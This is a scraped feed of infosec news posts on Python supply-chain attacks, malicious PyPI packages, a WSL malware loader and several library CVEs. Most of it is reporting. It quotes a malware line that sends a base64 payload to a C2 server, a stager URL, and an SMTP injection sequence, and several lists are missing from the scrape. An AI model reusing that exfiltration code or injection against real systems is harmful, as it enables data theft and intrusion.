The post Major Python Infrastructure Breach – Over 170K Users Compromised. How Safe Is Your Code? appeared first on Information Security Newspaper | Hacking News.
]]>One notable victim shared their experience of encountering suspicious activity related to the “colorama” package, which ultimately led to the realization that they had been hacked. This account underscores the stealth and deceit employed in the campaign, with the attackers leveraging fake Python mirrors and typosquatting to deceive users and spread malware through malicious GitHub repositories.
The fake Python mirror, appearing under the domain “files[.]pypihosted[.]org”, mimicked the official Python package mirror, playing a crucial role in the attack’s success. By hosting a tampered version of “colorama” laden with malicious code and utilizing stolen GitHub identities to commit changes to reputable repositories, the attackers showcased a sophisticated understanding of the software supply chain’s vulnerabilities.
The attack on the software supply chain leveraging fake Python infrastructure utilized a complex array of techniques to compromise over 170,000 users. Here’s a breakdown of the key attack techniques used:
Each of these techniques demonstrates the attackers’ deep understanding of both social engineering and technical vulnerabilities within the software supply chain. The combination of these methods allowed for a highly effective and damaging attack.
The attackers hosted a poisoned version of “colorama”, a widely used package in the Python community with over 150 million monthly downloads. Here’s how they executed this part of their sophisticated attack:
requirements.txt
files to include the malicious package version hosted on their fake mirror. This ensured that when the project was installed or updated, the poisoned “colorama” would be downloaded and executed.By hosting this poisoned “colorama” package on their fake Python infrastructure and linking it to popular projects, the attackers were able to execute a silent supply chain attack, compromising the systems of unsuspecting developers and users. This attack underscores the importance of verifying the sources of software dependencies and the need for vigilance in the face of increasingly sophisticated cyber threats.
The deployment of the malicious package in the attack using the fake Python infrastructure involved a sophisticated multi-stage process. Here’s a breakdown of the stages through which the malicious package, particularly the poisoned “colorama”, was deployed and executed on the victims’ systems:
These stages illustrate the meticulous planning and execution of the attack, showcasing the attackers’ technical sophistication and understanding of both software dependencies and human behavior. The multi-stage approach not only facilitated the deployment of the malicious payload but also helped in evading detection, making the attack particularly damaging.
The attack involving the fake Python infrastructure and the poisoned “colorama” package also saw the publication of several other malicious packages to the Python Package Index (PyPI). These packages were part of the attackers’ strategy to distribute malware through the Python package ecosystem. Below is a list of some of the packages involved in this campaign, along with their version numbers and the usernames of the publishers:
These packages, including variations of the “colorama” package and others with obscure or clickbait names, were part of a broader strategy to distribute malware. The attackers employed these packages as vectors for delivering malicious code to unsuspecting victims’ systems, exploiting the trust placed in the PyPI ecosystem and the routine use of these packages in Python projects.
This list provides a snapshot of the malicious packages published by the attackers, illustrating the scale and diversity of their efforts to infiltrate the software supply chain. Users and developers are urged to exercise caution and perform thorough vetting before incorporating third-party packages into their projects.
This campaign exemplifies the advanced strategies malicious actors adopt to infiltrate and compromise trusted platforms like PyPI and GitHub. It serves as a stark reminder of the necessity for diligence when installing packages and repositories, even from seemingly reliable sources. Vigilance, thorough vetting of dependencies, and the maintenance of robust security measures are paramount in mitigating the risks posed by such sophisticated attacks.
The post Major Python Infrastructure Breach – Over 170K Users Compromised. How Safe Is Your Code? appeared first on Information Security Newspaper | Hacking News.
]]>The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
]]>As reported just a few hours ago, the package received an update version identified as v0.2.6, which attracted attention because ctx Python had not received updates in 8 years.
After the update was reflected in the GitHub repository, some researchers began analyzing the code, finding some exciting features:
This code is specially crafted for when creating a dictionary; all its environment variables are sent to a URL of the Heroku application under attackers’ control.
Experts consider this a clear sign that the current version of the package has been manipulated for malicious purposes and should not be used.
Other versions of a ‘phpass’ fork, published in the Packagist repository, were also manipulated to add this malicious code. PHPass has reportedly been downloaded about 2.5 million times.
According to security researcher Somdev Sangwan, the insertion of this backdoor could be aimed at extracting access credentials for Amazon Web Services (AWS).
The malicious version was released on May 14, so users who installed the package before that date are employing the original version (v0.1.2) and will not be affected by this issue. On the other hand, any installation of ctx Python after May 14 could include malicious code.
About the attack method, specialists mention that the domain name of the original maintainers of ctx Python expired, which would have allowed the attackers to register it again and take control of this package, adding the malicious payload for later distribution.
The official page of the ctx Python project in PyPI has been removed, showing the error ‘Not Found’ to visitors.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
]]>The post Eight vulnerabilities in 16 URL parsing libraries written in C, JavaScript, PHP, Python and Ruby; hackers could deploy DoS and RCE attacks against thousands of web applications appeared first on Information Security Newspaper | Hacking News.
]]>According to the report, the flaws lie in the following developments:
As you may recall, URL parsing is the process of splitting the different components of a web address to properly route traffic through different links or to different servers. URL parsing libraries are imported into applications to fulfill this function and are available in various programming languages.
The components of a URL are known as schema, authority, path, query and fragments, which fulfill certain functions for their correct operation.
In their research, the experts found that flaws exist because of differences in the way each library performs this analysis. According to the report, the flaws reside in the following URL parsing libraries:
The analysis revealed a total of eight critical vulnerabilities in third-party web applications using these libraries. At the time of writing, all flaws had been addressed, except for those residing in versions of Flask that have ceased to receive support. The following describes the flaws detected:
Although these are all the flaws reported in this research, experts mention that the appearance of many other security flaws should not be ruled out, including server-side request forgery (SSRF) bugs and open redirection flaws, which would allow the deployment of sophisticated phishing campaigns and other hacking variants.
Users of affected deployments should carefully analyze all potential risks when using the affected URL parsing libraries, in order to configure the necessary security measures to prevent malicious exploitation of these errors.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Eight vulnerabilities in 16 URL parsing libraries written in C, JavaScript, PHP, Python and Ruby; hackers could deploy DoS and RCE attacks against thousands of web applications appeared first on Information Security Newspaper | Hacking News.
]]>The post Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors appeared first on Information Security Newspaper | Hacking News.
]]>The list of malicious packages detected in this research is shown below:
Among these packages, experts note that “importantpackage”,” “10Cent10” and “10Cent11” seem to establish an inverse layer on the compromised machine. In addition, “importantpackage” abuses the TLS CDN termination for data theft, in addition to using Fastly CDN to hide malicious communications with the C&C server.
According to the report, the communication code for this malware is:
url = “https://pypi.python.org” + “/images” + “?” + “guid=” + b64_payload
r = request.Request(url, headers = {‘Host’: “psec.forward.io.global.prod.fastly.net”})
The researchers note that this code causes an HTTPS request to be sent to pypi.python.org which is subsequently redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.
The dependency confusion technique involves loading contaminated components that have the same name as legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique is really good for tricking package managers into downloading and installing malicious modules.
The researchers conclude by mentioning that while this is an attack similar to other hacking techniques, it does give threat actors a way to act stealthily, plus it could function as the prelude to subsequent attacks.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors appeared first on Information Security Newspaper | Hacking News.
]]>The post New malware can infect Windows and Linux devices; 70 different VirusTotal antvirus can’t detect it appeared first on Information Security Newspaper | Hacking News.
]]>While the cybersecurity community had only theorized some potential problems, it wasn’t until experts at Black Lotus Labs published their latest research that the actual existence of severe security risks at WSL was confirmed. In their report, the experts mention having found a number of unusual ELF files, compiled for Debian Linux and written in Python 3 that become an ELF executable with PyInstaller.
According to the report, Python code acts as a loader by using multiple Windows APIs, allowing retrieval of a remote file and then injection into a running process. This technique would allow threat actors to meddle in the affected system by evading detection. As if that were not enough, the scan in VirusTotal confirms the difficulty of detection, since endpoint agents for Windows systems cannot detect ELF files.
The researchers detected two possible scenarios for the use of malicious ELF file uploaders: the first was written only in Python, while the second variant uses Python primarily to call various Windows APIs using ctypes and invoke a PowerShell script. Experts believe that the PowerShell variant is still under development, although this is a viable approach as it allows the creation of a proof of concept (PoC) that called the Windows API from the WSL subsystem.
This appears to be the first iteration of the ELF loader file. A notable feature is that this loader uses standard Python libraries, so it is compatible to run on both Linux and Windows machines. Experts ran a test sample in which the script displays the Russian characters “Пивет Саня”. All associated files contained private or non-routable IP addresses, except for one.
That sample contained a public IP address (185.63.90.137) and a loader file written in Python and converted into an executable via PyInstaller. This file attempts to allocate memory from the machines to later create a new process and inject a resource that was stored on a remote server in hxxp://185.63.90.137:1338/stagers/l5l.py. The file was already offline, indicating that threat actors left this address in a previous test or attack.
According to experts, some samples used PowerShell to inject and execute shell code, while others used Python ctypes to resolve Windows APIs. In a PowerShell sample, compiled Python called three functions: kill_av(), reverseshell(), and windowspersistance().
The kill_av() feature removes suspicious antivirus products and other scanning tools using os.popen(). The reverseshell() function starts a thread to run a Base64-encoded PowerShell script every 20 seconds within an infinite while true loop, blocking the execution of any other function; Finally, windowspersistence() copies the original ELF file to the appdata folder named payload.exe and uses a thread to add a registry execution key for persistence.
As you can see, threat actors are always trying to take advantage of new attack surfaces, so Black Lotus researchers recommend users with WSL enabled to make sure they properly register their resources to detect these types of threats.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post New malware can infect Windows and Linux devices; 70 different VirusTotal antvirus can’t detect it appeared first on Information Security Newspaper | Hacking News.
]]>The post Critical remote code execution vulnerability in Fail2ban. Protect your servers appeared first on Information Security Newspaper | Hacking News.
]]>Tracked as CVE-2021-32749, the fault resides in the mail-whois send action and exists due to incorrect input validation. Remote threat actors might send specially crafted requests to the target system in order to execute remote code arbitrarily.
The vulnerability received a score of 8.5/10 according to the Common Vulnerability Scoring System (CVSS) scale and its exploitation would allow threat actors to completely compromise the affected system.
This flaw was detected in the following versions of Fail2ban: 0.9.0, 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5, 0.9.6, 0.9.7, 0.10.0, 0.10.1, 0.10.2, 0.10.3, 0.10.3.1, 0.10.4, 0.10.5, 0.10.6, 0.11.1, and 0.11.2.
Although this vulnerability could be exploited by remote threat actors through the submission of specially crafted requests, researchers have not detected any active exploit attempts or the existence of a malware variant associated with the attack.
Fail2ban developers recommend users of vulnerable deployments update as soon as possible. Patches that address this flaw are now available. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Critical remote code execution vulnerability in Fail2ban. Protect your servers appeared first on Information Security Newspaper | Hacking News.
]]>The post IP address validation flaw also affects Python projects appeared first on Information Security Newspaper | Hacking News.
]]>A couple of months ago, reports were filed on a critical IP validation vulnerability in the network mask library used by thousands of applications. Tracked as CVE-2021-28918, this flaw exists in the npm and Perl versions of the network mask and other similar libraries.
The most recent report indicates that the ipaddress standard library introduced in Python 3.3 is also affected by this failure. According to the researchers responsible for the finding, the vulnerability exists due to incorrect ip address analysis by the affected library. As some will already know, the ipaddress module provides Python developers with various functions to easily create IP addresses, networks, and interfaces.
The IPv4 address can be presented in multiple formats (integers, decimals, hexadecimal, or octals), although it is usually presented in decimal format. Suppose you receive an IP address in decimal format, 127.0.0.1, which is widely understood as the local or localhost loopback address.
If you had to prefix a 0, should an application analyze it as 0127.0.0.1 or as 127.0.0.1? By analyzing the BleepingComputer platform website, you can type 0127.0.0.1 in the Chrome address bar, which the browser will try to complete as an IP address in octal format. Pressing Enter changes the IP to its decimal equivalent (87.0.0.1), which is how most applications assume to handle this type of IP address.
According to the original specification, for ambiguous IP addresses, parts of an IPv4 address can be interpreted as octal if they have the prefix “0”; however, in the case of the IP address of the standard Python library, the leading zeros will simply be removed. A proof of concept shows that the Python IP address library would simply discard the zeros at startup. To put it another way, when parsed using the Python ipaddress module, ‘010.8.8.8’ would be treated as ’10 .8.8.8′, instead of ‘8.8.8.8’.
“Incorrect input validation of octal strings in Python 3.8.0 to v3.10 stdlib ipaddress allows threat actors to perform Man-in-The-Middle (MiTM) attacks, request forgery, among other attack variants,” the investigation notes.
Although the ipaddress module was introduced in Python 3.3, this regression error was introduced in the module from Python version 3.8.0 through 3.10. Multiple options for temporary risk mitigation have been published on the project’s official platforms. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post IP address validation flaw also affects Python projects appeared first on Information Security Newspaper | Hacking News.
]]>The post Running Python Code, Without Python Installed on the System appeared first on Information Security Newspaper | Hacking News.
]]>Have you ever imagine running python code on Windows without installing python. There are always situations where during penetration testing you get into a device under test, which does not have python installed. If that device is not installed with python, then here comes the solution for you.
When there is no python installed on the system then you can embed the python into C# portable executable file, then the user can run python code. We show you step by step process to run python without installing python on Windows machine.
OS: Windows 10, x64 with Visual Studio 2015 installed
So we saw on how easy is to run python code without python on the system. There are many uses on this, in the penetration testing phases.
The post Running Python Code, Without Python Installed on the System appeared first on Information Security Newspaper | Hacking News.
]]>The post Zero-day vulnerability in Python allows DOS attack: No patch available appeared first on Information Security Newspaper | Hacking News.
]]>Below is a brief description of the reported vulnerability, in addition to its respective score and tracking key according to the Common Vulnerability Scoring System (CVSS).
Tracked as CVE-2020-14422, this vulnerability exists because the application incorrectly calculates hash values in the IPv4Interface and IPv6Interface classes within Lib/ipaddress.py in Python, which would allow remote hackers to deploy DoS attacks.
Threat actors can trigger the resource algorithm to perform the DoS attack if an application is affected by the performance of a dictionary that contains IPv4Interface or IPv6Interface objects, generating multiple dictionary entries, the experts of a pentest company.
The vulnerability received a score of 6.3/10 on the CVSS scale, so it is considered a medium security flaw. The flaw resides in the following Python versions: 3.8.0, 3.8.1, 3.8.2, and 3.8.3.
Although the vulnerability can be exploited by unauthenticated remote hackers over the network, experts from a pentest company have not yet detected cases of active exploitation. Researchers have also not detected the finding of any malware variant linked to this attack. The bad news is that there is no patch to fully mitigate the risk of exploitation.
For further reports on vulnerabilities, exploits, malware variants and computer security risks, it is recommended to enter the website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.
The post Zero-day vulnerability in Python allows DOS attack: No patch available appeared first on Information Security Newspaper | Hacking News.
]]>The post Python applications and projects using Urllib3 have a vulnerability that allows DoS attacks appeared first on Information Security Newspaper | Hacking News.
]]>It is worth mentioning that this library is used throughout the whole Python ecosystem, with more than 200 packages, including the most popular ones such as requests, selenium, kubernetes, among others. Given its broad capabilities, most users of one of the Python projects are most likely using Urllib3.
In the vulnerable version (1.25.2), logic was added to util/url.py to encode percent invalid characters in the request target. The method _encode_invalid_chars, as written, contains all the matches of percentage encodings, mention the participants of the hacking course.
For a URL of a certain length, the size value of percent_encoding corresponds to a linear runtime. The next step (normalize existing percentage encoded bytes) also requires a linear runtime for each percentage encoding. A threat actor could abuse this inefficiency to consume the processing resources of a target system, which would lead to the DoS condition, which could extend to undetermined periods.
The report was presented to the developers of the exposed library, who in turn recognized the presence of the flaw and rushed to release version 1.25.8, in which the DoS vulnerability has been fully mitigated.
As already mentioned, this is a widely used library in Python projects, so members of the hacking course recommend developers check if their projects use the vulnerable version of Urllib3. Many Python packages rely on Urllib3, so the vulnerability is likely to be present in projects as an indirect dependency, so it will not be possible for developers to install updates, depending on the dependency on higher level.
For more information on recently encountered security flaws, exploits, cyberattacks, and malware analysis, you can visit the official website of the International Institute of Cyber Security (IICS), as well as the official sites of tech companies.
The post Python applications and projects using Urllib3 have a vulnerability that allows DoS attacks appeared first on Information Security Newspaper | Hacking News.
]]>The post These five programming languages have flaws that expose apps to attack appeared first on Information Security Newspaper | Hacking News.
]]>The post These five programming languages have flaws that expose apps to attack appeared first on Information Security Newspaper | Hacking News.
]]>The post Java and Python have unpatched firewall-crossing FTP SNAFU appeared first on Information Security Newspaper | Hacking News.
]]>Stop us if you’ve heard this one: Java and Python have a bug you can exploit to cross firewalls. Since neither are yet patched, it might be a good day to nag your developers for a bit.
The Java vulnerability means protocol injection through its FTP implementation can fool a firewall into allowing TCP connections from the Internet to hosts on the inside.
That’s explained in rather more detail in two documents: this, by Alexander Klink, and this, by Blindspot Security’s Timothy Morgan.
Klink’s discovery was that Java’s XML eXternal Entity (XEE) mishandles FTP connections, because it doesn’t syntax-check the username Java passes to a server.
Specifically, cr
and lf
should be rejected but aren’t, allowing non-FTP commands to be injected into a connection request. Klink’s demonstration showed how to send an SMTP e-mail in an FTP connection attempt (even though the FTP connection failed).
EHLO a<CR><LF> MAIL FROM:<a@example.org><CR><LF> RCPT TO:<alech@alech.de><CR><LF> DATA<CR><LF> From: a@example.org<LF> To: alech@alech.de<LF> Subject: test<LF> <LF> test!<LF><CR><LF> .<CR><LF> QUIT<CR><LF>
Klink concluded that “this attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing.”
Morgan’s contribution was the realisation that the same behaviour can get an attacker through a firewall on its high ports (from 1024 to 65535), in a multi-stage process:
Morgan says he’s holding back publication of a proof-of-concept script until Oracle (and Python’s developers – more on this below) respond to the disclosure.
However, he envisages his exploit can be used for MITM attacks, server-side request forgery, an XEE attack and more – and once past the firewall, desktop hosts can be attacked even if they don’t have Java installed.
Python, he writes, is similarly vulnerable through its urllib
and urllib2
libraries, however “this injection appears to be limited to attacks via directory names specified in the URL”.
By way of mitigation, Morgan suggests disabling Java on desktops and in browsers; and disabling “classic mode” FTP on all firewalls.
Source:https://www.theregister.co.uk/
The post Java and Python have unpatched firewall-crossing FTP SNAFU appeared first on Information Security Newspaper | Hacking News.
]]>